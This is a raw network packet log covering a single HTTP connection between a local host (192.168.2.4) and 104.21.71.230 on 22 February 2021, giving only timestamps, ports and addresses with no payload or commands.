Feb 22, 2021 09:13:24.604238033 CET	49733	80	192.168.2.4	104.21.71.230
Feb 22, 2021 09:13:24.604341984 CET	49733	80	192.168.2.4	104.21.71.230
Feb 22, 2021 09:13:24.605041027 CET	80	49733	104.21.71.230	192.168.2.4
Feb 22, 2021 09:13:24.605076075 CET	80	49733	104.21.71.230	192.168.2.4
Feb 22, 2021 09:13:24.605103016 CET	80	49733	104.21.71.230	192.168.2.4
Feb 22, 2021 09:13:24.605407000 CET	49733	80	192.168.2.4	104.21.71.230
Feb 22, 2021 09:13:24.605920076 CET	80	49733	104.21.71.230	192.168.2.4
Feb 22, 2021 09:13:24.605948925 CET	80	49733	104.21.71.230	192.168.2.4
Feb 22, 2021 09:13:24.605972052 CET	80	49733	104.21.71.230	192.168.2.4
Feb 22, 2021 09:13:24.606775999 CET	80	49733	104.21.71.230	192.168.2.4
Feb 22, 2021 09:13:24.606795073 CET	49733	80	192.168.2.4	104.21.71.230
Feb 22, 2021 09:13:24.606805086 CET	49733	80	192.168.2.4	104.21.71.230
Feb 22, 2021 09:13:24.606813908 CET	80	49733	104.21.71.230	192.168.2.4
Feb 22, 2021 09:13:24.606838942 CET	80	49733	104.21.71.230	192.168.2.4
Feb 22, 2021 09:13:24.607533932 CET	49733	80	192.168.2.4	104.21.71.230
Feb 22, 2021 09:13:24.607640982 CET	80	49733	104.21.71.230	192.168.2.4
Feb 22, 2021 09:13:24.607670069 CET	80	49733	104.21.71.230	192.168.2.4
Feb 22, 2021 09:13:24.607693911 CET	80	49733	104.21.71.230	192.168.2.4
Feb 22, 2021 09:13:24.607705116 CET	49733	80	192.168.2.4	104.21.71.230
Feb 22, 2021 09:13:24.607822895 CET	49733	80	192.168.2.4	104.21.71.230
Feb 22, 2021 09:13:24.608455896 CET	80	49733	104.21.71.230	192.168.2.4
Feb 22, 2021 09:13:24.608491898 CET	80	49733	104.21.71.230	192.168.2.4
Feb 22, 2021 09:13:24.608530045 CET	80	49733	104.21.71.230	192.168.2.4
Feb 22, 2021 09:13:24.609256983 CET	80	49733	104.21.71.230	192.168.2.4
Feb 22, 2021 09:13:24.609289885 CET	80	49733	104.21.71.230	192.168.2.4
Feb 22, 2021 09:13:24.609309912 CET	49733	80	192.168.2.4	104.21.71.230
Feb 22, 2021 09:13:24.609316111 CET	80	49733	104.21.71.230	192.168.2.4
Feb 22, 2021 09:13:24.609323025 CET	49733	80	192.168.2.4	104.21.71.230
Feb 22, 2021 09:13:24.609364986 CET	49733	80	192.168.2.4	104.21.71.230
Feb 22, 2021 09:13:24.610080004 CET	80	49733	104.21.71.230	192.168.2.4
Feb 22, 2021 09:13:24.610114098 CET	80	49733	104.21.71.230	192.168.2.4
Feb 22, 2021 09:13:24.610138893 CET	80	49733	104.21.71.230	192.168.2.4
Feb 22, 2021 09:13:24.610888004 CET	80	49733	104.21.71.230	192.168.2.4
Feb 22, 2021 09:13:24.610920906 CET	80	49733	104.21.71.230	192.168.2.4
Feb 22, 2021 09:13:24.610935926 CET	49733	80	192.168.2.4	104.21.71.230
Feb 22, 2021 09:13:24.610943079 CET	80	49733	104.21.71.230	192.168.2.4
Feb 22, 2021 09:13:24.611036062 CET	49733	80	192.168.2.4	104.21.71.230
Feb 22, 2021 09:13:24.611044884 CET	49733	80	192.168.2.4	104.21.71.230
Feb 22, 2021 09:13:24.611676931 CET	80	49733	104.21.71.230	192.168.2.4
Feb 22, 2021 09:13:24.611712933 CET	80	49733	104.21.71.230	192.168.2.4
Feb 22, 2021 09:13:24.611747026 CET	80	49733	104.21.71.230	192.168.2.4
Feb 22, 2021 09:13:24.611999035 CET	49733	80	192.168.2.4	104.21.71.230
Feb 22, 2021 09:13:24.776027918 CET	80	49733	104.21.71.230	192.168.2.4
Feb 22, 2021 09:13:24.776057005 CET	80	49733	104.21.71.230	192.168.2.4
Feb 22, 2021 09:13:24.776077032 CET	80	49733	104.21.71.230	192.168.2.4
Feb 22, 2021 09:13:24.776093960 CET	80	49733	104.21.71.230	192.168.2.4
Feb 22, 2021 09:13:24.776110888 CET	80	49733	104.21.71.230	192.168.2.4
Feb 22, 2021 09:13:24.776211023 CET	49733	80	192.168.2.4	104.21.71.230
Feb 22, 2021 09:13:24.776249886 CET	49733	80	192.168.2.4	104.21.71.230
Feb 22, 2021 09:13:24.776360035 CET	80	49733	104.21.71.230	192.168.2.4
Feb 22, 2021 09:13:24.776706934 CET	49733	80	192.168.2.4	104.21.71.230
Feb 22, 2021 09:13:24.830527067 CET	80	49733	104.21.71.230	192.168.2.4
Feb 22, 2021 09:13:24.830564022 CET	80	49733	104.21.71.230	192.168.2.4
Feb 22, 2021 09:13:24.830581903 CET	80	49733	104.21.71.230	192.168.2.4
Feb 22, 2021 09:13:24.830598116 CET	80	49733	104.21.71.230	192.168.2.4
Feb 22, 2021 09:13:24.830611944 CET	80	49733	104.21.71.230	192.168.2.4
Feb 22, 2021 09:13:24.830756903 CET	49733	80	192.168.2.4	104.21.71.230
Feb 22, 2021 09:13:24.830779076 CET	49733	80	192.168.2.4	104.21.71.230
Feb 22, 2021 09:13:24.831048965 CET	80	49733	104.21.71.230	192.168.2.4
Feb 22, 2021 09:13:24.831069946 CET	80	49733	104.21.71.230	192.168.2.4
Feb 22, 2021 09:13:24.831089973 CET	80	49733	104.21.71.230	192.168.2.4
Feb 22, 2021 09:13:24.831109047 CET	80	49733	104.21.71.230	192.168.2.4
Feb 22, 2021 09:13:24.831125021 CET	80	49733	104.21.71.230	192.168.2.4
Feb 22, 2021 09:13:24.831126928 CET	49733	80	192.168.2.4	104.21.71.230
Feb 22, 2021 09:13:24.831171989 CET	49733	80	192.168.2.4	104.21.71.230
Feb 22, 2021 09:13:24.831723928 CET	80	49733	104.21.71.230	192.168.2.4
Feb 22, 2021 09:13:24.831747055 CET	80	49733	104.21.71.230	192.168.2.4
Feb 22, 2021 09:13:24.831763983 CET	80	49733	104.21.71.230	192.168.2.4
Feb 22, 2021 09:13:24.831780910 CET	80	49733	104.21.71.230	192.168.2.4
Feb 22, 2021 09:13:24.831902027 CET	49733	80	192.168.2.4	104.21.71.230
Feb 22, 2021 09:13:24.866377115 CET	80	49733	104.21.71.230	192.168.2.4
Feb 22, 2021 09:13:24.866404057 CET	80	49733	104.21.71.230	192.168.2.4
Feb 22, 2021 09:13:24.866420984 CET	80	49733	104.21.71.230	192.168.2.4
Feb 22, 2021 09:13:24.866441011 CET	80	49733	104.21.71.230	192.168.2.4
Feb 22, 2021 09:13:24.866458893 CET	80	49733	104.21.71.230	192.168.2.4
Feb 22, 2021 09:13:24.866507053 CET	49733	80	192.168.2.4	104.21.71.230
Feb 22, 2021 09:13:24.866739035 CET	80	49733	104.21.71.230	192.168.2.4
Feb 22, 2021 09:13:24.866764069 CET	80	49733	104.21.71.230	192.168.2.4
Feb 22, 2021 09:13:24.866786003 CET	80	49733	104.21.71.230	192.168.2.4
Feb 22, 2021 09:13:24.866790056 CET	49733	80	192.168.2.4	104.21.71.230
Feb 22, 2021 09:13:24.866811037 CET	80	49733	104.21.71.230	192.168.2.4
Feb 22, 2021 09:13:24.866833925 CET	80	49733	104.21.71.230	192.168.2.4
Feb 22, 2021 09:13:24.866835117 CET	49733	80	192.168.2.4	104.21.71.230
Feb 22, 2021 09:13:24.866900921 CET	49733	80	192.168.2.4	104.21.71.230
Feb 22, 2021 09:13:24.866909027 CET	49733	80	192.168.2.4	104.21.71.230
Feb 22, 2021 09:13:24.867696047 CET	80	49733	104.21.71.230	192.168.2.4
Feb 22, 2021 09:13:24.867727041 CET	80	49733	104.21.71.230	192.168.2.4
Feb 22, 2021 09:13:24.867748976 CET	80	49733	104.21.71.230	192.168.2.4
Feb 22, 2021 09:13:24.867773056 CET	80	49733	104.21.71.230	192.168.2.4
Feb 22, 2021 09:13:24.867798090 CET	80	49733	104.21.71.230	192.168.2.4
Feb 22, 2021 09:13:24.867826939 CET	49733	80	192.168.2.4	104.21.71.230
Feb 22, 2021 09:13:24.868035078 CET	49733	80	192.168.2.4	104.21.71.230
Feb 22, 2021 09:13:24.868628025 CET	80	49733	104.21.71.230	192.168.2.4
Feb 22, 2021 09:13:24.868659019 CET	80	49733	104.21.71.230	192.168.2.4
Feb 22, 2021 09:13:24.868680954 CET	80	49733	104.21.71.230	192.168.2.4
Feb 22, 2021 09:13:24.868702888 CET	80	49733	104.21.71.230	192.168.2.4
Feb 22, 2021 09:13:24.868726969 CET	80	49733	104.21.71.230	192.168.2.4
Feb 22, 2021 09:13:24.868757963 CET	49733	80	192.168.2.4	104.21.71.230
Feb 22, 2021 09:13:24.868776083 CET	49733	80	192.168.2.4	104.21.71.230
Feb 22, 2021 09:13:24.869373083 CET	49733	80	192.168.2.4	104.21.71.230
Feb 22, 2021 09:13:24.869537115 CET	80	49733	104.21.71.230	192.168.2.4
Feb 22, 2021 09:13:24.869555950 CET	80	49733	104.21.71.230	192.168.2.4
Feb 22, 2021 09:13:24.869568110 CET	80	49733	104.21.71.230	192.168.2.4
Feb 22, 2021 09:13:24.869585037 CET	80	49733	104.21.71.230	192.168.2.4
Feb 22, 2021 09:13:24.869604111 CET	80	49733	104.21.71.230	192.168.2.4
Feb 22, 2021 09:13:24.869716883 CET	49733	80	192.168.2.4	104.21.71.230
Feb 22, 2021 09:13:24.869735003 CET	49733	80	192.168.2.4	104.21.71.230
Feb 22, 2021 09:13:24.870408058 CET	80	49733	104.21.71.230	192.168.2.4
Feb 22, 2021 09:13:24.870424032 CET	80	49733	104.21.71.230	192.168.2.4
Feb 22, 2021 09:13:24.870436907 CET	80	49733	104.21.71.230	192.168.2.4
Feb 22, 2021 09:13:24.870452881 CET	80	49733	104.21.71.230	192.168.2.4
Feb 22, 2021 09:13:24.870469093 CET	80	49733	104.21.71.230	192.168.2.4
Feb 22, 2021 09:13:24.870490074 CET	49733	80	192.168.2.4	104.21.71.230
Feb 22, 2021 09:13:24.871342897 CET	80	49733	104.21.71.230	192.168.2.4
Feb 22, 2021 09:13:24.871364117 CET	80	49733	104.21.71.230	192.168.2.4
Feb 22, 2021 09:13:24.871377945 CET	80	49733	104.21.71.230	192.168.2.4
Feb 22, 2021 09:13:24.871387959 CET	49733	80	192.168.2.4	104.21.71.230
Feb 22, 2021 09:13:24.871395111 CET	80	49733	104.21.71.230	192.168.2.4
Feb 22, 2021 09:13:24.871412039 CET	80	49733	104.21.71.230	192.168.2.4
Feb 22, 2021 09:13:24.871423006 CET	49733	80	192.168.2.4	104.21.71.230
Feb 22, 2021 09:13:24.871849060 CET	49733	80	192.168.2.4	104.21.71.230
Feb 22, 2021 09:13:24.872252941 CET	80	49733	104.21.71.230	192.168.2.4
Feb 22, 2021 09:13:24.872271061 CET	80	49733	104.21.71.230	192.168.2.4
Feb 22, 2021 09:13:24.872286081 CET	80	49733	104.21.71.230	192.168.2.4
Feb 22, 2021 09:13:24.872298956 CET	80	49733	104.21.71.230	192.168.2.4
Feb 22, 2021 09:13:24.872314930 CET	80	49733	104.21.71.230	192.168.2.4
Feb 22, 2021 09:13:24.872375965 CET	49733	80	192.168.2.4	104.21.71.230
Feb 22, 2021 09:13:24.872426033 CET	49733	80	192.168.2.4	104.21.71.230
Feb 22, 2021 09:13:24.873157024 CET	80	49733	104.21.71.230	192.168.2.4
Feb 22, 2021 09:13:24.873174906 CET	80	49733	104.21.71.230	192.168.2.4
Feb 22, 2021 09:13:24.873191118 CET	80	49733	104.21.71.230	192.168.2.4
Feb 22, 2021 09:13:24.873207092 CET	80	49733	104.21.71.230	192.168.2.4
Feb 22, 2021 09:13:24.873276949 CET	49733	80	192.168.2.4	104.21.71.230
Feb 22, 2021 09:13:25.201800108 CET	80	49733	104.21.71.230	192.168.2.4
Feb 22, 2021 09:13:25.201824903 CET	80	49733	104.21.71.230	192.168.2.4
Feb 22, 2021 09:13:25.201844931 CET	80	49733	104.21.71.230	192.168.2.4
Feb 22, 2021 09:13:25.201919079 CET	49733	80	192.168.2.4	104.21.71.230
Feb 22, 2021 09:13:25.274853945 CET	80	49733	104.21.71.230	192.168.2.4
Feb 22, 2021 09:13:25.274873018 CET	80	49733	104.21.71.230	192.168.2.4
Feb 22, 2021 09:13:25.274889946 CET	80	49733	104.21.71.230	192.168.2.4
Feb 22, 2021 09:13:25.274905920 CET	80	49733	104.21.71.230	192.168.2.4
Feb 22, 2021 09:13:25.274921894 CET	80	49733	104.21.71.230	192.168.2.4
Feb 22, 2021 09:13:25.274987936 CET	49733	80	192.168.2.4	104.21.71.230
Feb 22, 2021 09:13:25.275259018 CET	80	49733	104.21.71.230	192.168.2.4
Feb 22, 2021 09:13:25.275278091 CET	80	49733	104.21.71.230	192.168.2.4
Feb 22, 2021 09:13:25.275293112 CET	80	49733	104.21.71.230	192.168.2.4
Feb 22, 2021 09:13:25.275295973 CET	49733	80	192.168.2.4	104.21.71.230
Feb 22, 2021 09:13:25.275305986 CET	80	49733	104.21.71.230	192.168.2.4
Feb 22, 2021 09:13:25.275360107 CET	49733	80	192.168.2.4	104.21.71.230
Feb 22, 2021 09:13:25.300424099 CET	80	49733	104.21.71.230	192.168.2.4
Feb 22, 2021 09:13:25.300447941 CET	80	49733	104.21.71.230	192.168.2.4
Feb 22, 2021 09:13:25.300461054 CET	80	49733	104.21.71.230	192.168.2.4
Feb 22, 2021 09:13:25.300477982 CET	80	49733	104.21.71.230	192.168.2.4
Feb 22, 2021 09:13:25.300494909 CET	80	49733	104.21.71.230	192.168.2.4
Feb 22, 2021 09:13:25.300532103 CET	49733	80	192.168.2.4	104.21.71.230
Feb 22, 2021 09:13:25.300827980 CET	80	49733	104.21.71.230	192.168.2.4
Feb 22, 2021 09:13:25.300844908 CET	80	49733	104.21.71.230	192.168.2.4
Feb 22, 2021 09:13:25.300862074 CET	80	49733	104.21.71.230	192.168.2.4
Feb 22, 2021 09:13:25.300872087 CET	49733	80	192.168.2.4	104.21.71.230
Feb 22, 2021 09:13:25.300879955 CET	80	49733	104.21.71.230	192.168.2.4
Feb 22, 2021 09:13:25.300896883 CET	80	49733	104.21.71.230	192.168.2.4
Feb 22, 2021 09:13:25.300905943 CET	49733	80	192.168.2.4	104.21.71.230
Feb 22, 2021 09:13:25.300993919 CET	49733	80	192.168.2.4	104.21.71.230
Feb 22, 2021 09:13:25.301002026 CET	49733	80	192.168.2.4	104.21.71.230
Feb 22, 2021 09:13:25.301817894 CET	80	49733	104.21.71.230	192.168.2.4
Feb 22, 2021 09:13:25.301847935 CET	80	49733	104.21.71.230	192.168.2.4
Feb 22, 2021 09:13:25.301873922 CET	80	49733	104.21.71.230	192.168.2.4
Feb 22, 2021 09:13:25.301908016 CET	80	49733	104.21.71.230	192.168.2.4
Feb 22, 2021 09:13:25.301935911 CET	49733	80	192.168.2.4	104.21.71.230
Feb 22, 2021 09:13:25.301938057 CET	80	49733	104.21.71.230	192.168.2.4
Feb 22, 2021 09:13:25.302000046 CET	49733	80	192.168.2.4	104.21.71.230
Feb 22, 2021 09:13:25.302719116 CET	80	49733	104.21.71.230	192.168.2.4
Feb 22, 2021 09:13:25.302756071 CET	80	49733	104.21.71.230	192.168.2.4
Feb 22, 2021 09:13:25.302784920 CET	80	49733	104.21.71.230	192.168.2.4
Feb 22, 2021 09:13:25.302791119 CET	49733	80	192.168.2.4	104.21.71.230
Feb 22, 2021 09:13:25.302812099 CET	80	49733	104.21.71.230	192.168.2.4
Feb 22, 2021 09:13:25.302839994 CET	49733	80	192.168.2.4	104.21.71.230
Feb 22, 2021 09:13:25.331789970 CET	80	49733	104.21.71.230	192.168.2.4
Feb 22, 2021 09:13:25.331831932 CET	80	49733	104.21.71.230	192.168.2.4
Feb 22, 2021 09:13:25.331852913 CET	80	49733	104.21.71.230	192.168.2.4
Feb 22, 2021 09:13:25.331871033 CET	80	49733	104.21.71.230	192.168.2.4
Feb 22, 2021 09:13:25.331892967 CET	80	49733	104.21.71.230	192.168.2.4
Feb 22, 2021 09:13:25.331950903 CET	49733	80	192.168.2.4	104.21.71.230
Feb 22, 2021 09:13:25.332050085 CET	80	49733	104.21.71.230	192.168.2.4
Feb 22, 2021 09:13:25.332609892 CET	49733	80	192.168.2.4	104.21.71.230
Feb 22, 2021 09:13:25.410600901 CET	49733	80	192.168.2.4	104.21.71.230
Feb 22, 2021 09:13:25.657088995 CET	80	49733	104.21.71.230	192.168.2.4
Feb 22, 2021 09:13:25.657121897 CET	80	49733	104.21.71.230	192.168.2.4
Feb 22, 2021 09:13:25.657143116 CET	80	49733	104.21.71.230	192.168.2.4
Feb 22, 2021 09:13:25.657217979 CET	49733	80	192.168.2.4	104.21.71.230
Feb 22, 2021 09:13:25.987175941 CET	80	49733	104.21.71.230	192.168.2.4
Feb 22, 2021 09:13:25.987215042 CET	80	49733	104.21.71.230	192.168.2.4
Feb 22, 2021 09:13:25.987240076 CET	80	49733	104.21.71.230	192.168.2.4
Feb 22, 2021 09:13:25.987437010 CET	49733	80	192.168.2.4	104.21.71.230
Feb 22, 2021 09:13:26.223007917 CET	49733	80	192.168.2.4	104.21.71.230
Feb 22, 2021 09:13:26.311928988 CET	80	49733	104.21.71.230	192.168.2.4
Feb 22, 2021 09:13:26.311959982 CET	80	49733	104.21.71.230	192.168.2.4
Feb 22, 2021 09:13:26.311971903 CET	80	49733	104.21.71.230	192.168.2.4
Feb 22, 2021 09:13:26.314177990 CET	49733	80	192.168.2.4	104.21.71.230
Feb 22, 2021 09:13:26.373188972 CET	80	49733	104.21.71.230	192.168.2.4
Feb 22, 2021 09:13:26.373214960 CET	80	49733	104.21.71.230	192.168.2.4
Feb 22, 2021 09:13:26.373228073 CET	80	49733	104.21.71.230	192.168.2.4
Feb 22, 2021 09:13:26.373248100 CET	80	49733	104.21.71.230	192.168.2.4
Feb 22, 2021 09:13:26.373267889 CET	80	49733	104.21.71.230	192.168.2.4
Feb 22, 2021 09:13:26.373446941 CET	49733	80	192.168.2.4	104.21.71.230
Feb 22, 2021 09:13:26.373466969 CET	49733	80	192.168.2.4	104.21.71.230
Feb 22, 2021 09:13:26.373538017 CET	80	49733	104.21.71.230	192.168.2.4
Feb 22, 2021 09:13:26.373555899 CET	80	49733	104.21.71.230	192.168.2.4
Feb 22, 2021 09:13:26.373569012 CET	80	49733	104.21.71.230	192.168.2.4
Feb 22, 2021 09:13:26.373577118 CET	80	49733	104.21.71.230	192.168.2.4
Feb 22, 2021 09:13:26.373596907 CET	49733	80	192.168.2.4	104.21.71.230
Feb 22, 2021 09:13:26.373639107 CET	49733	80	192.168.2.4	104.21.71.230
Feb 22, 2021 09:13:26.402501106 CET	80	49733	104.21.71.230	192.168.2.4
Feb 22, 2021 09:13:26.402540922 CET	80	49733	104.21.71.230	192.168.2.4
Feb 22, 2021 09:13:26.402560949 CET	80	49733	104.21.71.230	192.168.2.4
Feb 22, 2021 09:13:26.402585030 CET	80	49733	104.21.71.230	192.168.2.4
Feb 22, 2021 09:13:26.402602911 CET	80	49733	104.21.71.230	192.168.2.4
Feb 22, 2021 09:13:26.402832031 CET	80	49733	104.21.71.230	192.168.2.4
Feb 22, 2021 09:13:26.402857065 CET	80	49733	104.21.71.230	192.168.2.4
Feb 22, 2021 09:13:26.402867079 CET	49733	80	192.168.2.4	104.21.71.230
Feb 22, 2021 09:13:26.402880907 CET	80	49733	104.21.71.230	192.168.2.4
Feb 22, 2021 09:13:26.402892113 CET	49733	80	192.168.2.4	104.21.71.230
Feb 22, 2021 09:13:26.402904987 CET	80	49733	104.21.71.230	192.168.2.4
Feb 22, 2021 09:13:26.402928114 CET	80	49733	104.21.71.230	192.168.2.4
Feb 22, 2021 09:13:26.402935028 CET	49733	80	192.168.2.4	104.21.71.230
Feb 22, 2021 09:13:26.402992964 CET	49733	80	192.168.2.4	104.21.71.230
Feb 22, 2021 09:13:26.403752089 CET	80	49733	104.21.71.230	192.168.2.4
Feb 22, 2021 09:13:26.403950930 CET	49733	80	192.168.2.4	104.21.71.230
Feb 22, 2021 09:13:26.435277939 CET	80	49733	104.21.71.230	192.168.2.4
Feb 22, 2021 09:13:26.435305119 CET	80	49733	104.21.71.230	192.168.2.4
Feb 22, 2021 09:13:26.435321093 CET	80	49733	104.21.71.230	192.168.2.4
Feb 22, 2021 09:13:26.435333967 CET	80	49733	104.21.71.230	192.168.2.4
Feb 22, 2021 09:13:26.435352087 CET	80	49733	104.21.71.230	192.168.2.4
Feb 22, 2021 09:13:26.435457945 CET	49733	80	192.168.2.4	104.21.71.230
Feb 22, 2021 09:13:26.435491085 CET	49733	80	192.168.2.4	104.21.71.230
Feb 22, 2021 09:13:26.435576916 CET	80	49733	104.21.71.230	192.168.2.4
Feb 22, 2021 09:13:26.435611010 CET	80	49733	104.21.71.230	192.168.2.4
Feb 22, 2021 09:13:26.435635090 CET	80	49733	104.21.71.230	192.168.2.4
Feb 22, 2021 09:13:26.435686111 CET	80	49733	104.21.71.230	192.168.2.4
Feb 22, 2021 09:13:26.435687065 CET	49733	80	192.168.2.4	104.21.71.230
Feb 22, 2021 09:13:26.435725927 CET	80	49733	104.21.71.230	192.168.2.4
Feb 22, 2021 09:13:26.435728073 CET	49733	80	192.168.2.4	104.21.71.230
Feb 22, 2021 09:13:26.435797930 CET	49733	80	192.168.2.4	104.21.71.230
Feb 22, 2021 09:13:26.436480045 CET	80	49733	104.21.71.230	192.168.2.4
Feb 22, 2021 09:13:26.436510086 CET	80	49733	104.21.71.230	192.168.2.4
Feb 22, 2021 09:13:26.436532974 CET	80	49733	104.21.71.230	192.168.2.4
Feb 22, 2021 09:13:26.436551094 CET	80	49733	104.21.71.230	192.168.2.4
Feb 22, 2021 09:13:26.437478065 CET	49733	80	192.168.2.4	104.21.71.230
Feb 22, 2021 09:13:26.437494040 CET	49733	80	192.168.2.4	104.21.71.230
Feb 22, 2021 09:13:26.469131947 CET	80	49733	104.21.71.230	192.168.2.4
Feb 22, 2021 09:13:26.469151020 CET	80	49733	104.21.71.230	192.168.2.4
Feb 22, 2021 09:13:26.469166040 CET	80	49733	104.21.71.230	192.168.2.4
Feb 22, 2021 09:13:26.469182968 CET	80	49733	104.21.71.230	192.168.2.4
Feb 22, 2021 09:13:26.469197989 CET	80	49733	104.21.71.230	192.168.2.4
Feb 22, 2021 09:13:26.469259977 CET	49733	80	192.168.2.4	104.21.71.230
Feb 22, 2021 09:13:26.469405890 CET	49733	80	192.168.2.4	104.21.71.230
Feb 22, 2021 09:13:26.469546080 CET	80	49733	104.21.71.230	192.168.2.4
Feb 22, 2021 09:13:26.469562054 CET	80	49733	104.21.71.230	192.168.2.4
Feb 22, 2021 09:13:26.469575882 CET	80	49733	104.21.71.230	192.168.2.4
Feb 22, 2021 09:13:26.469590902 CET	80	49733	104.21.71.230	192.168.2.4
Feb 22, 2021 09:13:26.469603062 CET	49733	80	192.168.2.4	104.21.71.230
Feb 22, 2021 09:13:26.469609022 CET	80	49733	104.21.71.230	192.168.2.4
Feb 22, 2021 09:13:26.469629049 CET	49733	80	192.168.2.4	104.21.71.230
Feb 22, 2021 09:13:26.470026970 CET	49733	80	192.168.2.4	104.21.71.230
Feb 22, 2021 09:13:26.470494032 CET	80	49733	104.21.71.230	192.168.2.4
Feb 22, 2021 09:13:26.470513105 CET	80	49733	104.21.71.230	192.168.2.4
Feb 22, 2021 09:13:26.470527887 CET	80	49733	104.21.71.230	192.168.2.4
Feb 22, 2021 09:13:26.470540047 CET	80	49733	104.21.71.230	192.168.2.4
Feb 22, 2021 09:13:26.470556021 CET	80	49733	104.21.71.230	192.168.2.4
Feb 22, 2021 09:13:26.470664024 CET	49733	80	192.168.2.4	104.21.71.230
Feb 22, 2021 09:13:26.471379042 CET	80	49733	104.21.71.230	192.168.2.4
Feb 22, 2021 09:13:26.471391916 CET	80	49733	104.21.71.230	192.168.2.4
Feb 22, 2021 09:13:26.471539021 CET	49733	80	192.168.2.4	104.21.71.230
Feb 22, 2021 09:13:26.500821114 CET	80	49733	104.21.71.230	192.168.2.4
Feb 22, 2021 09:13:26.500848055 CET	80	49733	104.21.71.230	192.168.2.4
Feb 22, 2021 09:13:26.500860929 CET	80	49733	104.21.71.230	192.168.2.4
Feb 22, 2021 09:13:26.500878096 CET	80	49733	104.21.71.230	192.168.2.4
Feb 22, 2021 09:13:26.500897884 CET	80	49733	104.21.71.230	192.168.2.4
Feb 22, 2021 09:13:26.501044989 CET	49733	80	192.168.2.4	104.21.71.230
Feb 22, 2021 09:13:26.501065969 CET	49733	80	192.168.2.4	104.21.71.230
Feb 22, 2021 09:13:26.501099110 CET	80	49733	104.21.71.230	192.168.2.4
Feb 22, 2021 09:13:26.501116991 CET	80	49733	104.21.71.230	192.168.2.4
Feb 22, 2021 09:13:26.501142979 CET	80	49733	104.21.71.230	192.168.2.4
Feb 22, 2021 09:13:26.501166105 CET	80	49733	104.21.71.230	192.168.2.4
Feb 22, 2021 09:13:26.501187086 CET	80	49733	104.21.71.230	192.168.2.4
Feb 22, 2021 09:13:26.501189947 CET	49733	80	192.168.2.4	104.21.71.230
Feb 22, 2021 09:13:26.501209021 CET	80	49733	104.21.71.230	192.168.2.4
Feb 22, 2021 09:13:26.501235008 CET	49733	80	192.168.2.4	104.21.71.230
Feb 22, 2021 09:13:26.501375914 CET	49733	80	192.168.2.4	104.21.71.230
Feb 22, 2021 09:13:26.502072096 CET	80	49733	104.21.71.230	192.168.2.4
Feb 22, 2021 09:13:26.502114058 CET	80	49733	104.21.71.230	192.168.2.4
Feb 22, 2021 09:13:26.502136946 CET	80	49733	104.21.71.230	192.168.2.4
Feb 22, 2021 09:13:26.502160072 CET	80	49733	104.21.71.230	192.168.2.4
Feb 22, 2021 09:13:26.502176046 CET	49733	80	192.168.2.4	104.21.71.230
Feb 22, 2021 09:13:26.502182007 CET	80	49733	104.21.71.230	192.168.2.4
Feb 22, 2021 09:13:26.502213001 CET	49733	80	192.168.2.4	104.21.71.230
Feb 22, 2021 09:13:26.502999067 CET	80	49733	104.21.71.230	192.168.2.4
Feb 22, 2021 09:13:26.503216028 CET	49733	80	192.168.2.4	104.21.71.230
Feb 22, 2021 09:13:26.532974958 CET	80	49733	104.21.71.230	192.168.2.4
Feb 22, 2021 09:13:26.533004999 CET	80	49733	104.21.71.230	192.168.2.4
Feb 22, 2021 09:13:26.533020020 CET	80	49733	104.21.71.230	192.168.2.4
Feb 22, 2021 09:13:26.533041954 CET	80	49733	104.21.71.230	192.168.2.4
Feb 22, 2021 09:13:26.533061028 CET	80	49733	104.21.71.230	192.168.2.4
Feb 22, 2021 09:13:26.533428907 CET	49733	80	192.168.2.4	104.21.71.230
Feb 22, 2021 09:13:26.533446074 CET	49733	80	192.168.2.4	104.21.71.230
Feb 22, 2021 09:13:26.533453941 CET	80	49733	104.21.71.230	192.168.2.4
Feb 22, 2021 09:13:26.533473015 CET	80	49733	104.21.71.230	192.168.2.4
Feb 22, 2021 09:13:26.533493042 CET	80	49733	104.21.71.230	192.168.2.4
Feb 22, 2021 09:13:26.533539057 CET	49733	80	192.168.2.4	104.21.71.230
Feb 22, 2021 09:13:26.533548117 CET	80	49733	104.21.71.230	192.168.2.4
Feb 22, 2021 09:13:26.533584118 CET	80	49733	104.21.71.230	192.168.2.4
Feb 22, 2021 09:13:26.533586025 CET	49733	80	192.168.2.4	104.21.71.230
Feb 22, 2021 09:13:26.533636093 CET	49733	80	192.168.2.4	104.21.71.230
Feb 22, 2021 09:13:26.534454107 CET	80	49733	104.21.71.230	192.168.2.4
Feb 22, 2021 09:13:26.534482002 CET	80	49733	104.21.71.230	192.168.2.4
Feb 22, 2021 09:13:26.534502983 CET	80	49733	104.21.71.230	192.168.2.4
Feb 22, 2021 09:13:26.534526110 CET	80	49733	104.21.71.230	192.168.2.4
Feb 22, 2021 09:13:26.534548044 CET	80	49733	104.21.71.230	192.168.2.4
Feb 22, 2021 09:13:26.534581900 CET	49733	80	192.168.2.4	104.21.71.230
Feb 22, 2021 09:13:26.534603119 CET	49733	80	192.168.2.4	104.21.71.230
Feb 22, 2021 09:13:26.535187960 CET	80	49733	104.21.71.230	192.168.2.4
Feb 22, 2021 09:13:26.535218954 CET	80	49733	104.21.71.230	192.168.2.4
Feb 22, 2021 09:13:26.535243988 CET	80	49733	104.21.71.230	192.168.2.4
Feb 22, 2021 09:13:26.535264015 CET	80	49733	104.21.71.230	192.168.2.4
Feb 22, 2021 09:13:26.535296917 CET	49733	80	192.168.2.4	104.21.71.230
Feb 22, 2021 09:13:26.535382986 CET	49733	80	192.168.2.4	104.21.71.230
Feb 22, 2021 09:13:26.565001965 CET	80	49733	104.21.71.230	192.168.2.4
Feb 22, 2021 09:13:26.565031052 CET	80	49733	104.21.71.230	192.168.2.4
Feb 22, 2021 09:13:26.565052032 CET	80	49733	104.21.71.230	192.168.2.4
Feb 22, 2021 09:13:26.565074921 CET	80	49733	104.21.71.230	192.168.2.4
Feb 22, 2021 09:13:26.565094948 CET	80	49733	104.21.71.230	192.168.2.4
Feb 22, 2021 09:13:26.565218925 CET	49733	80	192.168.2.4	104.21.71.230
Feb 22, 2021 09:13:26.565248966 CET	49733	80	192.168.2.4	104.21.71.230
Feb 22, 2021 09:13:26.565392971 CET	80	49733	104.21.71.230	192.168.2.4
Feb 22, 2021 09:13:26.565437078 CET	80	49733	104.21.71.230	192.168.2.4
Feb 22, 2021 09:13:26.565460920 CET	80	49733	104.21.71.230	192.168.2.4
Feb 22, 2021 09:13:26.565493107 CET	80	49733	104.21.71.230	192.168.2.4
Feb 22, 2021 09:13:26.565499067 CET	49733	80	192.168.2.4	104.21.71.230
Feb 22, 2021 09:13:26.565516949 CET	80	49733	104.21.71.230	192.168.2.4
Feb 22, 2021 09:13:26.565542936 CET	49733	80	192.168.2.4	104.21.71.230
